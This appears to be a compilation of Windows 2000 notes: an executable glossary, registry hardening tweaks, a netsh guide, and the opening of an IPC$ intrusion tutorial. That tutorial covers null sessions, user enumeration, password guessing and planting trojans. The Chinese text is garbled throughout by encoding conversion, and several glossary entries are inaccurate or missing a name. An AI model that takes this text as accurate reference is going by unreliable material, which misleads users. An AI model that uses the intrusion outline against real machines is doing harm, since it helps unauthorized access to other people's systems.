odbcad32.exe > ODBC 32-bit Administrator 32位ODBC管理

?

odbcconf.exe > Configure ODBC driver's and data source's from command line 命令行配置ODBC驅(qū)動(dòng)和數(shù)據(jù)源

?

os2.exe > An OS/2 Warp Server (os2 /o) OS/2

?

os2srv.exe > An OS/2 Warp Server OS/2

?

os2ss.exe > An OS/2 Warp Server OS/2

?

osk.exe > On Screen Keyboard 屏幕鍵盤

?

packager.exe > Windows 2000 Packager Manager 對(duì)象包裝程序

?

pathping.exe > Combination of Ping and Tracert 包含Ping和Tracert的程序

?

pax.exe > is a POSIX program and path names used as arguments must be specified in POSIX format. Use "file://C/Users/Default" instead of "C:\USERS\DEFAULT." 啟動(dòng)便攜式存檔互換 (Pax) 實(shí)用程序

?

pentnt.exe > Used to check the Pentium for the floating point division error. 檢查Pentium的浮點(diǎn)錯(cuò)誤

?

perfmon.exe > Starts Windows Performance Monitor 性能監(jiān)視器

?

ping.exe > Packet Internet Groper 驗(yàn)證與遠(yuǎn)程計(jì)算機(jī)的連接

?

posix.exe > Used for backward compatibility with Unix 用于兼容Unix

?

print.exe > Cmd line used to print files 打印文本文件或顯示打印隊(duì)列的內(nèi)容。

?

progman.exe > Program manager 程序管理器

?

proquota.exe > Profile quota program

?

psxss.exe > POSIX Subsystem Application Posix子系統(tǒng)應(yīng)用程序

?

qappsrv.exe > Displays the available application terminal servers on the network
在網(wǎng)絡(luò)上顯示終端服務(wù)器可用的程序

?

qprocess.exe > Display information about processes local or remote 在本地或遠(yuǎn)程顯示進(jìn)程的信息（需終端服務(wù)）

?

query.exe > Query TERMSERVER user process and sessions 查詢進(jìn)程和對(duì)話

?

quser.exe > Display information about a user logged on 顯示用戶登陸的信息（需終端服務(wù)）

?

qwinsta.exe > Display information about Terminal Sessions. 顯示終端服務(wù)的信息

?

rasadmin.exe > Start the remote access admin service 啟動(dòng)遠(yuǎn)程訪問服務(wù)

?

rasautou.exe > Creates a RAS connection 建立一個(gè)RAS連接

?

rasdial.exe > Dial a connection 撥號(hào)連接

?

rasphone.exe > Starts a RAS connection 運(yùn)行RAS連接

?

rcp.exe > Copies a file from and to a RCP service. 在 Windows 2000 計(jì)算機(jī)和運(yùn)行遠(yuǎn)程外殼端口監(jiān)控程序 rshd 的系統(tǒng)之間復(fù)制文件

?

rdpclip.exe > RdpClip allows you to copy and paste files between a terminal session and client console session. 再終端和本地復(fù)制和粘貼文件

?

recover.exe > Recovers readable information from a bad or defective disk 從壞的或有缺陷的磁盤中恢復(fù)可讀取的信息。

?

redir.exe > Starts the redirector service 運(yùn)行重定向服務(wù)

?

regedt32.exe > 32-bit register service 32位注冊(cè)服務(wù)

?

regini.exe > modify registry permissions from within a script 用腳本修改注冊(cè)許可

?

register.exe > Register a program so it can have special execution characteristics. 注冊(cè)包含特殊運(yùn)行字符的程序

?

regsvc.exe >

?

regsvr32.exe > Registers and unregister's dll's. As to how and where it register's them I dont know. 注冊(cè)和反注冊(cè)DLL

?

regtrace.exe > Options to tune debug options for applications failing to dump trace statements
Trace 設(shè)置
regwiz.exe > Registration Wizard 注冊(cè)向?qū)?

?

remrras.exe >

?

replace.exe > Replace files 用源目錄中的同名文件替換目標(biāo)目錄中的文件。

?

reset.exe > Reset an active section 重置活動(dòng)部分

?

rexec.exe > Runs commands on remote hosts running the REXEC service. 在運(yùn)行 REXEC 服務(wù)的遠(yuǎn)程計(jì)算機(jī)上運(yùn)行命令。rexec 命令在執(zhí)行指定命令前，驗(yàn)證遠(yuǎn)程計(jì)算機(jī)上的用戶名，只有安裝了 TCP/IP 協(xié)議后才可以使用該命令。

?

risetup.exe > Starts the Remote Installation Service Wizard. 運(yùn)行遠(yuǎn)程安裝向?qū)Х?wù)

?

route.exe > display or edit the current routing tables. 控制網(wǎng)絡(luò)路由表

?

routemon.exe > no longer supported 不再支持了！

?

router.exe > Router software that runs either on a dedicated DOS or on an OS/2 system. Route軟件在 DOS或者是OS/2系統(tǒng)

?

rsh.exe > Runs commands on remote hosts running the RSH service 在運(yùn)行 RSH 服務(wù)的遠(yuǎn)程計(jì)算機(jī)上運(yùn)行命令

?

rsm.exe > Mounts and configures remote system media 配置遠(yuǎn)程系統(tǒng)媒體

?

rsnotify.exe > Remote storage notification recall 遠(yuǎn)程存儲(chǔ)通知回顯

?

rsvp.exe > Resource reservation protocol 源預(yù)約協(xié)議

?

runas.exe > RUN a program as another user 允許用戶用其他權(quán)限運(yùn)行指定的工具和程序

?

rundll32.exe > Launches a 32-bit dll program 啟動(dòng)32位DLL程序

?

runonce.exe > Causes a program to run during startup 運(yùn)行程序再開始菜單中

?

rwinsta.exe > Reset the session subsystem hardware and software to known initial values 重置會(huì)話子系統(tǒng)硬件和軟件到最初的值

?

savedump.exe > Does not write to e:\winnt\user.dmp 不寫入U(xiǎn)ser.dmp中

?

scardsvr.exe > Smart Card resource management server 子能卡資源管理服務(wù)器

?

schupgr.exe > It will read the schema update files (.ldf files) and upgrade the schema. (part of ADSI) 讀取計(jì)劃更新文件和更新計(jì)劃

?

secedit.exe > Starts Security Editor help 自動(dòng)安全性配置管理

?

services.exe > Controls all the services 控制所有服務(wù)

?

sethc.exe > Set High Contrast - changes colours and display mode Logoff to set it back to normal 設(shè)置高對(duì)比

?

setreg.exe > Shows the Software Publishing State Key Values 顯示軟件發(fā)布的國家語言

?

setup.exe > GUI box prompts you to goto control panel to configure system components 安裝程序（轉(zhuǎn)到控制面板）

?

setver.exe > Set Version for Files 設(shè)置 MS-DOS 子系統(tǒng)向程序報(bào)告的 MS-DOS 版本號(hào)

?

sfc.exe > System File Checker test and check system files for integrity 系統(tǒng)文件檢查

?

sfmprint.exe > Print Services for Macintosh 打印Macintosh服務(wù)

?

sfmpsexe.exe >

?

sfmsvc.exe >

?

shadow.exe > Monitor another Terminal Services session. 監(jiān)控另外一臺(tái)中端服務(wù)器會(huì)話

?

share.exe > Windows 2000 和 MS-DOS 子系統(tǒng)不使用該命令。接受該命令只是為了與 MS-DOS 文件兼容

?

shmgrate.exe >

?

shrpubw.exe > Create and Share folders 建立和共享文件夾

?

sigverif.exe > File Signature Verification 文件簽名驗(yàn)證

?

skeys.exe > Serial Keys utility 序列號(hào)制作工具

?

smlogsvc.exe > Performance Logs and Alerts 性能日志和警報(bào)

?

smss.exe >

?

sndrec32.exe > starts the Windows Sound Recorder 錄音機(jī)

?

sndvol32.exe > Display the current volume information 顯示聲音控制信息

?

snmp.exe > Simple Network Management Protocol used for Network Mangement 簡單網(wǎng)絡(luò)管理協(xié)議

?

snmptrap.exe > Utility used with SNMP SNMP工具

?

sol.exe > Windows Solitaire Game 紙牌

?

sort.exe > Compares files and Folders 讀取輸入、排序數(shù)據(jù)并將結(jié)果寫到屏幕、文件和其他設(shè)備上

?

SPOOLSV.EXE > Part of the spooler service for printing 打印池服務(wù)的一部分

?

sprestrt.exe >

?

srvmgr.exe > Starts the Windows Server Manager 服務(wù)器管理器

?

stimon.exe > WDM StillImage- > Monitor

?

stisvc.exe > WDM StillImage- > Service

?

subst.exe > Associates a path with a drive letter 將路徑與驅(qū)動(dòng)器盤符關(guān)聯(lián)

?

svchost.exe > Svchost.exe is a generic host process name for services that are run from dynamic-link libraries (DLLs). DLL得主進(jìn)程

?

syncapp.exe > Creates Windows Briefcase. 創(chuàng)建Windows文件包

?

sysedit.exe > Opens Editor for 4 system files 系統(tǒng)配置編輯器

?

syskey.exe > Encrypt and secure system database NT賬號(hào)數(shù)據(jù)庫按群工具

?

sysocmgr.exe > Windows 2000 Setup 2000安裝程序

?

systray.exe > Starts the systray in the lower right corner. 在低權(quán)限運(yùn)行systray

?

taskman.exe > Task Manager 任務(wù)管理器

?

taskmgr.exe > Starts the Windows 2000 Task Manager 任務(wù)管理器

?

tcmsetup.exe > telephony client wizard 電話服務(wù)客戶安裝

?

tcpsvcs.exe > TCP Services TCP服務(wù)

?

.exe > Telnet Utility used to connect to Telnet Server

?

termsrv.exe > Terminal Server 終端服務(wù)

?

tftp.exe > Trivial FTP 將文件傳輸?shù)秸谶\(yùn)行 TFTP 服務(wù)的遠(yuǎn)程計(jì)算機(jī)或從正在運(yùn)行 TFTP 服務(wù)的遠(yuǎn)程計(jì)算機(jī)傳輸文件

?

tftpd.exe > Trivial FTP Daemon

?

themes.exe > Change Windows Themes 桌面主題

?

tlntadmn.exe > Telnet Server Administrator Telnet服務(wù)管理

?

tlntsess.exe > Display the current Telnet Sessions 顯示目前的Telnet會(huì)話

?

tlntsvr.exe > Start the Telnet Server 開始Telnet服務(wù)

?

tracert.exe > Trace a route to display paths 該診斷實(shí)用程序?qū)煌鏁r(shí)間 (TTL) 值的 Internet 控制消息協(xié)議 (ICMP) 回顯數(shù)據(jù)包發(fā)送到目標(biāo)，以決定到達(dá)目標(biāo)采用的路由

?

tsadmin.exe > Terminal Server Administrator 終端服務(wù)管理器

?

tscon.exe > Attaches a user session to a terminal session. 粘貼用戶會(huì)話到終端對(duì)話

?

tsdiscon.exe > Disconnect a user from a terminal session 斷開終端服務(wù)的用戶

?

tskill.exe > Kill a Terminal server process 殺掉終端服務(wù)

?

tsprof.exe > Used with Terminal Server to query results. 用終端服務(wù)得出查詢結(jié)果

?

tsshutdn.exe > Shutdown the system 關(guān)閉系統(tǒng)

?

unlodctr.exe > Part of performance monitoring 性能監(jiān)視器的一部分

?

upg351db.exe > Upgrade a jet database 升級(jí)Jet數(shù)據(jù)庫

?

ups.exe > UPS service UPS服務(wù)

?

user.exe > Core Windows Service Windows核心服務(wù)

?

userinit.exe > Part of the winlogon process Winlogon進(jìn)程的一部分

?

usrmgr.exe > Start the windows user manager for domains 域用戶管理器

?

utilman.exe > This tool enables an administrator to designate which computers automatically open accessibility tools when Windows 2000 starts. 指定2000啟動(dòng)時(shí)自動(dòng)打開那臺(tái)機(jī)器

?

verifier.exe > Driver Verifier Manager Driver Verifier Manager

?

vwipxspx.exe > Loads IPX/SPX VDM 調(diào)用IPX/SPX VDM

?

w32tm.exe > Windows Time Server 時(shí)間服務(wù)器

?

wextract.exe > Used to extract windows files 解壓縮Windows文件

?

winchat.exe > Opens Windows Chat 打開Windows聊天

?

winhlp32.exe > Starts the Windows Help System 運(yùn)行幫助系統(tǒng)

?

winlogon.exe > Used as part of the logon process. Logon進(jìn)程的一部分

?

winmine.exe > windows Game 挖地雷

?

winmsd.exe > Windows Diagnostic utility 系統(tǒng)信息

?

wins.exe > Wins Service Wins服務(wù)

?

winspool.exe > Print Routing 打印路由

?

winver.exe > Displays the current version of Windows 顯示W(wǎng)indows版本

?

wizmgr.exe > Starts Windows Administration Wizards Windows管理向?qū)?

?

wjview.exe > Command line loader for Java 命令行調(diào)用Java

?

wowdeb.exe > . For starters, the 32-bit APIs require that the WOWDEB.EXE task runs in the target debugee's VM 啟動(dòng)時(shí)，32位API需要

?

wowexec.exe > For running Windows over Windows Applications 在Windows應(yīng)用程序上運(yùn)行Windows

?

wpnpinst.exe > ?

?

write.exe > Starts MS Write Program 寫字板

?

wscript.exe > Windows Scripting Utility 腳本工具

?

wupdmgr.exe > Starts the Windows update Wizard (Internet) 運(yùn)行Windows升級(jí)向?qū)?

?

xcopy.exe > Used to copy directories 復(fù)制文件和目錄，包括子目錄

?

　　1、設(shè)置生存時(shí)間

?

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

?

　　DefaultTTL REG_DWORD 0-0xff(0-255 十進(jìn)制，默認(rèn)值128)

?

　　說明：指定傳出IP數(shù)據(jù)包中設(shè)置的默認(rèn)生存時(shí)間(TTL)值。TTL決定了IP數(shù)據(jù)包在到達(dá)目標(biāo)前在網(wǎng)絡(luò)中生存的最大時(shí)間。它實(shí)際上限定了IP數(shù)據(jù)包在丟棄前允許通過的路由器數(shù)量.有時(shí)利用此數(shù)值來探測(cè)遠(yuǎn)程主機(jī)操作系統(tǒng)。 　　2、防止ICMP重定向報(bào)文的攻擊

?

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

?

　　EnableICMPRedirects REG_DWORD 0x0(默認(rèn)值為0x1)

?

　　說明：該參數(shù)控制Windows 2000是否會(huì)改變其路由表以響應(yīng)網(wǎng)絡(luò)設(shè)備(如路由器)發(fā)送給它的ICMP重定向消息，有時(shí)會(huì)被利用來干壞事.Win2000中默認(rèn)值為1，表示響應(yīng)ICMP重定向報(bào)文。

?

　　3、禁止響應(yīng)ICMP路由通告報(bào)文

?

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Inter

?

　　faces\interface

?

　　PerformRouterDiscovery REG_DWORD 0x0(默認(rèn)值為0x2)

?

　 　說明："ICMP路由公告"功能可造成他人計(jì)算機(jī)的網(wǎng)絡(luò)連接異常，數(shù)據(jù)被竊聽，計(jì)算機(jī)被用于流量攻擊等嚴(yán)重后果.此問題曾導(dǎo)致校園網(wǎng)某些局域網(wǎng)大面積， 長時(shí)間的網(wǎng)絡(luò)異常。因此建議關(guān)閉響應(yīng)ICMP路由通告報(bào)文.Win2000中默認(rèn)值為2，表示當(dāng)DHCP發(fā)送路由器發(fā)現(xiàn)選項(xiàng)時(shí)啟用。

?

　　4、防止SYN洪水攻擊

?

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

?

　　SynAttackProtect REG_DWORD 0x2(默認(rèn)值為0x0)

?

　 　說明：SYN攻擊保護(hù)包括減少SYN-ACK重新傳輸次數(shù)，以減少分配資源所保留的時(shí)間。路由緩存項(xiàng)資源分配延遲，直到建立連接為止.如果 synattackprotect=2，則AFD的連接指示一直延遲到三路握手完成為止.注意，僅在TcpMaxHalfOpen和 TcpMaxHalfOpenRetried設(shè)置超出范圍時(shí)，保護(hù)機(jī)制才會(huì)采取措施。

?

　5、禁止C$、D$一類的缺省共享

?

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters

?

　　AutoShareServer、REG_DWORD、0x0

?

　　6、禁止ADMIN$缺省共享

?

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters

?

　　AutoShareWks、REG_DWORD、0x0

?

　　7、限制IPC$缺省共享

?

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa

?

　　restrictanonymous REG_DWORD 0x0 缺省

?

　　　　　　　　　　　　　　0x1 匿名用戶無法列舉本機(jī)用戶列表

?

　　　　　　　　　　　　　　0x2 匿名用戶無法連接本機(jī)IPC$共享

?

　　說明：不建議使用2，否則可能會(huì)造成你的一些服務(wù)無法啟動(dòng)，如SQL Server

?

　　8、不支持IGMP協(xié)議

?

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

?

　　IGMPLevel REG_DWORD 0x0(默認(rèn)值為0x2)

?

　　說明：記得Win9x下有個(gè)bug，就是用可以用IGMP使別人藍(lán)屏，修改注冊(cè)表可以修正這個(gè)bug.Win2000雖然沒這個(gè)bug了，但I(xiàn)GMP并不是必要的，因此照樣可以去掉。改成0后用route print將看不到那個(gè)討厭的224.0.0.0項(xiàng)了。

?

　　9、設(shè)置arp緩存老化時(shí)間設(shè)置

?

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services：\Tcpip\Parameters

?

　　ArpCacheLife　REG_DWORD 0-0xFFFFFFFF(秒數(shù)，默認(rèn)值為120秒)

?

　　ArpCacheMinReferencedLife　REG_DWORD 0-0xFFFFFFFF(秒數(shù)，默認(rèn)值為600)

?

　 　說明：如果ArpCacheLife大于或等于ArpCacheMinReferencedLife，則引用或未引用的ARP緩存項(xiàng)在 ArpCacheLife秒后到期。如果ArpCacheLife小于ArpCacheMinReferencedLife，未引用項(xiàng)在 ArpCacheLife秒后到期，而引用項(xiàng)在ArpCacheMinReferencedLife秒后到期。每次將出站數(shù)據(jù)包發(fā)送到項(xiàng)的IP地址時(shí)，就 會(huì)引用ARP緩存中的項(xiàng)。

?

　10、禁止死網(wǎng)關(guān)監(jiān)測(cè)技術(shù)

?

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services：\Tcpip\Parameters

?

　　EnableDeadGWDetect REG_DWORD 0x0(默認(rèn)值為ox1)

?

　　說明：如果你設(shè)置了多個(gè)網(wǎng)關(guān)，那么你的機(jī)器在處理多個(gè)連接有困難時(shí)，就會(huì)自動(dòng)改用備份網(wǎng)關(guān)。有時(shí)候這并不是一項(xiàng)好主意，建議禁止死網(wǎng)關(guān)監(jiān)測(cè)。

?

　　11、不支持路由功能

?

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services：\Tcpip\Parameters

?

　　IPEnableRouter REG_DWORD 0x0(默認(rèn)值為0x0)

?

　　說明：把值設(shè)置為0x1可以使Win2000具備路由功能，由此帶來不必要的問題。

?

　　12、做NAT時(shí)放大轉(zhuǎn)換的對(duì)外端口最大值

?

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services：\Tcpip\Parameters

?

　　MaxUserPort REG_DWORD 5000-65534(十進(jìn)制)(默認(rèn)值0x1388--十進(jìn)制為5000)

?

　　說明：當(dāng)應(yīng)用程序從系統(tǒng)請(qǐng)求可用的用戶端口數(shù)時(shí)，該參數(shù)控制所使用的最大端口數(shù)。正常情況下，短期端口的分配數(shù)量為1024-5000。將該參數(shù)設(shè)置到有效范圍以外時(shí)，就會(huì)使用最接近的有效數(shù)值(5000或65534)。使用NAT時(shí)建議把值放大點(diǎn)。

?

　　13、修改MAC地址

?

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\

?

　　找到右窗口的說明為"網(wǎng)卡"的目錄，

?

　　比如說是{4D36E972-E325-11CE-BFC1-08002BE10318}

?

展 開之，在其下的0000，0001，0002...的分支中找到"DriverDesc"的鍵值為你網(wǎng)卡的說明，比如說"DriverDesc"的值為 "Intel(R) 82559 Fast Ethernet LAN on Motherboard"然后在右窗口新建一字符串值，名字為"Networkaddress"，內(nèi)容為你想要的MAC值，比如說是 "004040404040"然后重起計(jì)算機(jī)，ipconfig /all看看。
曾幾何時(shí)，大家都有想過在命令行下改IP和網(wǎng)關(guān)。以前在NT4下實(shí)現(xiàn)起來過于麻煩，現(xiàn)在Windows 2000下的Netsh命令能實(shí)現(xiàn)該功能了。

?

Netsh 是本地或遠(yuǎn)程計(jì)算機(jī)的 Windows 2000 網(wǎng)絡(luò)組件的命令行和腳本實(shí)用程序。為了存檔或配置其他服務(wù)器，Netsh 實(shí)用程序也可以將配置腳本保存在文本文件中。

?

Netsh 實(shí)用程序是一個(gè)外殼，它通過附加的"Netsh 幫助 DLL"，可以支持多個(gè) Windows 2000 組件。"Netsh 幫助 DLL"提供用來監(jiān)視或配置特定 Windows 2000 網(wǎng)絡(luò)組件的其他命令，從而擴(kuò)展了 Netsh 的功能。每個(gè)"Netsh 幫助 DLL"都為特定的網(wǎng)絡(luò)組件提供了一個(gè)環(huán)境和一組命令。每個(gè)環(huán)境中都可以有子環(huán)境。例如，在路由環(huán)境中存在子環(huán)境 Ip 和 Ipx，它們將 IP 路由和 IPX 路由命令集中在一起。

?

Netsh 命令行選項(xiàng)包括下列各項(xiàng)：

?

用法: netsh [-a AliasFile] [-c Context] [-r RemoteMachine]
[Command | -f ScriptFile]

?

下列指令有效:

?

此上下文中的命令:
? - 顯示命令列表。
aaaa - 更改到 `aaaa' 上下文。
add - 將一個(gè)配置項(xiàng)添加到項(xiàng)目列表中。
delete - 在項(xiàng)目列表上刪除一個(gè)配置項(xiàng)目。
dhcp - 更改到 `dhcp' 上下文。
dump 0 - 顯示一個(gè)配置腳本。
exec - 運(yùn)行一個(gè)腳本文件。
help - 顯示命令列表。
interface - 更改到 `interface' 上下文。
ras - 更改到 `ras' 上下文。
routing - 更改到 `routing' 上下文。
set - 更新配置設(shè)置。
show - 顯示信息
wins - 更改到 `wins' 上下文。

?

下列的子上下文可用:
routing interface ras dhcp wins aaaa

?

若需要命令的更多幫助信息，請(qǐng)鍵入命令，
后面跟 ?。
-a AliasFile
指定使用了一個(gè)別名文件。別名文件包含 netsh 命令列表和一個(gè)別名版本，所以可以使用別名命令行替換 netsh 命令。可以使用別名文件將其他平臺(tái)中更熟悉的命令映射到適當(dāng)?shù)?netsh 命令。

?

-c Context
指定對(duì)應(yīng)于已安裝的支持 DLL 的命令環(huán)境。

?

命令
指定要執(zhí)行的 netsh 命令。

?

-f ScriptFile
指定運(yùn)行 ScriptFile 文件中所有的 netsh 命令。

?

-r RemoteMachine
指定在遠(yuǎn)程計(jì)算機(jī)上運(yùn)行 netsh 命令，由名稱或 IP 地址來指定遠(yuǎn)程計(jì)算機(jī)。

?

您 可以將命令縮寫為意義明確的最短的字符串。例如，發(fā)布 sh ip int 命令相當(dāng)于發(fā)布 show ip interface。Netsh 命令可以是全局的或特定環(huán)境的。全局命令可以在任何環(huán)境中發(fā)布，并用于一般的 Netsh 實(shí)用程序功能。特定環(huán)境的命令隨環(huán)境而變化。您可以將發(fā)布的命令記錄在日志文件中，以創(chuàng)建 netsh 命令會(huì)話的審核蹤跡。

?

列出了 netsh 全局命令。

?

命令 說明
.. 上移一個(gè)環(huán)境等級(jí)。
? 或 help 顯示命令行"幫助"。
show version 顯示 Windows 和 Netsh 實(shí)用程序的當(dāng)前版本。
show netdlls 顯示已安裝的"Netsh 幫助 DLL"的當(dāng)前版本。
add helper 添加"Netsh 幫助 DLL"。
delete helper 刪除"Netsh 幫助 DLL"。
show helper 顯示已安裝的"Netsh 幫助 DLL"。
cmd 創(chuàng)建 Windows 2000 命令窗口。
online 將當(dāng)前模式設(shè)置為聯(lián)機(jī)。
offline 將當(dāng)前模式設(shè)置為脫機(jī)。
set mode 將當(dāng)前模式設(shè)置為聯(lián)機(jī)或脫機(jī)。
show mode 顯示當(dāng)前模式。
flush 丟棄以脫機(jī)模式進(jìn)行的任何更改。
commit 提交以脫機(jī)模式進(jìn)行的更改。
set audit-logging 打開或關(guān)閉記錄工具。
show audit-logging 顯示當(dāng)前的審核記錄設(shè)置。
set loglevel 設(shè)置記錄信息的級(jí)別
show loglevel 顯示記錄信息的級(jí)別。
set machine 配置執(zhí)行 netsh 命令的計(jì)算機(jī)。
show machine 顯示執(zhí)行 netsh 命令的計(jì)算機(jī)。
exec 執(zhí)行包括 netsh 命令的腳本文件。
quit 或 bye 或 exit 退出 Netsh 實(shí)用程序。
add alias 向現(xiàn)有命令添加別名。
delete alias 刪除現(xiàn)有命令的別名。
show alias 顯示所有已定義的別名。
dump 將配置寫入文本文件。
popd 從堆棧中彈出環(huán)境的腳本命令。
pushd 將當(dāng)前的環(huán)境推入堆棧的腳本命令。

?

Netsh 實(shí)用程序有如下命令模式：

?

聯(lián)機(jī)
聯(lián)機(jī)模式下，在 Netsh 命令提示符下發(fā)布的命令被立即執(zhí)行。

?

脫機(jī)
脫機(jī)模式下,將在 Netsh 命令提示符下積累發(fā)布的命令，并通過發(fā)布 commit 全局命令來按照批處理方式執(zhí)行。可以通過發(fā)布 flush 全局命令來丟棄積累的命令。

?

腳本
使用 -f 命令行選項(xiàng)，或在 Netsh 命令提示符下發(fā)布 exec 全局命令，可以執(zhí)行指定文件中所有的 netsh 命令。

?

要 創(chuàng)建當(dāng)前配置的腳本，請(qǐng)使用 dump 全局命令。dump 命令根據(jù) netsh 命令輸出當(dāng)前運(yùn)行的配置。可以使用該命令創(chuàng)建的腳本來配置新的服務(wù)器或重新配置現(xiàn)有的服務(wù)器。如果要對(duì)組件的配置作很大的更改，推薦您使用 dump 命令開始配置會(huì)話，以防在進(jìn)行更改前需要還原配置。

?

Interface 命令
下表列出了可在 Windows 2000 命令提示符下鍵入的 netsh 命令，這些命令用于管理運(yùn)行 Windows 2000 Server 及"路由和遠(yuǎn)程訪問"服務(wù)的計(jì)算機(jī)上的接口設(shè)置。如果對(duì)某個(gè)特殊功能有多個(gè)命令，則在每個(gè)命令之間用斜線 (/) 分隔。

?

當(dāng)在命令提示符下鍵入命令時(shí)，請(qǐng)?jiān)诿總€(gè)命令前加上 netsh。要獲得每個(gè)命令的精確語法，可在命令之后鍵入 ?。選項(xiàng)例如，要獲得 netsh interface 命令的命令行"幫助"，請(qǐng)?jiān)诿钐崾痉骆I入 netsh interface?。

?

命令 說明
interface set/show interface 啟用、禁用、連接、斷開連接以及顯示請(qǐng)求撥號(hào)接口的配置。
interface set/show credentials 在請(qǐng)求撥號(hào)接口上配置或顯示用戶名、密碼和域名。

?

言歸正傳，現(xiàn)在來看看WIN2000下的網(wǎng)絡(luò)設(shè)置的配置。 D:\>netsh
netsh>interface
interface>dump
#========================
# 接口配置
#========================
pushd interface

?

reset all

?

popd
# 接口配置結(jié)束

?

# ----------------------------------
# 接口 IP 配置
# ----------------------------------
pushd interface ip

?

# "本地連接 2" 的接口 IP 配置

?

set address name = "本地連接 2" source = dhcp
set dns name = "本地連接 2" source = dhcp
set wins name = "本地連接 2" source = dhcp

?

# "本地連接" 的接口 IP 配置

?

set address name = "本地連接" source = static addr = 192.168.1.10 mask = 255.255.255.0
set address name = "本地連接" gateway = 192.168.0.1 gwmetric = 1
set dns name = "本地連接" source = static addr = 192.168.0.1
set wins name = "本地連接" source = static addr = none

?

popd
# 接口 IP 配置結(jié)束

?

如果,你想快速修改一個(gè)本地IP地址。
你可以先用文本寫入以下的內(nèi)容：

?

interface ip
set address 本地連接 static 192.168.5.10 255.255.255.0 192.168.0.1 1
^^^ ^^^ ^^^ ^^^ ^^
接口名稱 IP地址 子網(wǎng)掩碼 網(wǎng)關(guān) 接口躍點(diǎn)數(shù)

?

如上保存為 local.sh

?

D:\>netsh exec local.sh
IPC$命令詳解:

?

網(wǎng)上關(guān)于ipc$入侵的文章可謂多如牛毛,而且也不乏優(yōu)秀之作,攻擊步驟甚至可以說已經(jīng)成為經(jīng)典的模式,因此也沒人愿意再把這已經(jīng)成為定式的東西拿出來擺弄.
不過話雖這樣說,但我個(gè)人認(rèn)為這些文章講解的并不詳細(xì),對(duì)于第一次接觸ipc$的菜鳥來說,簡單的羅列步驟并不能解答他們的許多迷惑(你隨便找一個(gè)hack論壇搜一下ipc,看存在的疑惑有多少).
因此我寫了這篇相當(dāng)于解惑的教程.想把一些容易混淆,容易迷惑人的問題說清楚,讓大家不要總徘徊在原地!如果你看完這篇帖子仍有疑問,請(qǐng)馬上回復(fù)!

?

二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的資源(大家都是這么說的)，它是為了讓進(jìn)程間通信而開放的命名管道，可以通過驗(yàn)證用戶名和密碼獲得相應(yīng)的權(quán)限,在遠(yuǎn)程管理計(jì)算機(jī)和查看計(jì)算機(jī)的共享資源時(shí)使用。
利用IPC$,連接者甚至可以與目標(biāo)主機(jī)建立一個(gè)空的連接而無需用戶名與密碼(當(dāng)然,對(duì)方機(jī)器必須開了ipc$共享,否則你是連接不上的)，而利用這個(gè)空的連接，連接者還可以得到目標(biāo)主機(jī)上的用戶列表(不過負(fù)責(zé)的管理員會(huì)禁止導(dǎo)出用戶列表的)。
我們總在說ipc$漏洞ipc$漏洞,其實(shí),ipc$并不是真正意義上的漏洞,它是為了方便管理員的遠(yuǎn)程管理而開放的遠(yuǎn)程網(wǎng)絡(luò)登陸功能,而且還打開了默認(rèn)共享,即所有的邏輯盤(c$,d$,e$……)和系統(tǒng)目錄winnt或windows(admin$)。
所有的這些,初衷都是為了方便管理員的管理,但好的初衷并不一定有好的收效,一些別有用心者(到底是什么用心?我也不知道,代詞一個(gè))會(huì)利用IPC$，訪問共享資源,導(dǎo)出用戶列表,并使用一些字典工具，進(jìn)行密碼探測(cè),寄希望于獲得更高的權(quán)限,從而達(dá)到不可告人的目的.

?

解惑:
1)IPC連接是Windows NT及以上系統(tǒng)中特有的遠(yuǎn)程網(wǎng)絡(luò)登陸功能，其功能相當(dāng)于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函數(shù)，所以不能在Windows 9.x中運(yùn)行。
也就是說只有nt/2000/xp才可以建立ipc$連接,98/me是不能建立ipc$連接的(但有些朋友說在98下能建立空的連接,不知道是真是假,不過現(xiàn)在都2003年了,建議98的同志換一下系統(tǒng)吧,98不爽的)
2)即使是空連接也不是100%都能建立成功,如果對(duì)方關(guān)閉了ipc$共享,你仍然無法建立連接
3)并不是說建立了ipc$連接就可以查看對(duì)方的用戶列表,因?yàn)楣芾韱T可以禁止導(dǎo)出用戶列表

?

三 建立ipc$連接在hack攻擊中的作用
就 像上面所說的,即使你建立了一個(gè)空的連接,你也可以獲得不少的信息(而這些信息往往是入侵中必不可少的),訪問部分共享,如果你能夠以某一個(gè)具有一定權(quán)限 的用戶身份登陸的話,那么你就會(huì)得到相應(yīng)的權(quán)限,顯然,如果你以管理員身份登陸,嘿嘿,就不用我在多說了吧,what u want,u can do!!
(基本上可以總結(jié)為獲取目標(biāo)信息、管理目標(biāo)進(jìn)程和服務(wù),上傳木馬并運(yùn)行,如果是2000server，還可以考慮開啟終端服務(wù)方便控制.怎么樣?夠厲害吧!)
不過你也不要高興的太早,因?yàn)楣芾韱T的密碼不是那么好搞到的,雖然會(huì)有一些傻傻的管理員用空口令或者弱智密碼,但這畢竟是少數(shù),而且現(xiàn)在不比從前了,隨著人們安全意識(shí)的提高,管理員們也愈加小心了,得到管理員密碼會(huì)越來越難的
因此今后你最大的可能就是以極小的權(quán)限甚至是沒有權(quán)限進(jìn)行連接,你會(huì)慢慢的發(fā)現(xiàn)ipc$連接并不是萬能的,甚至在主機(jī)不開啟ipc$共享時(shí),你根本就無法連接.
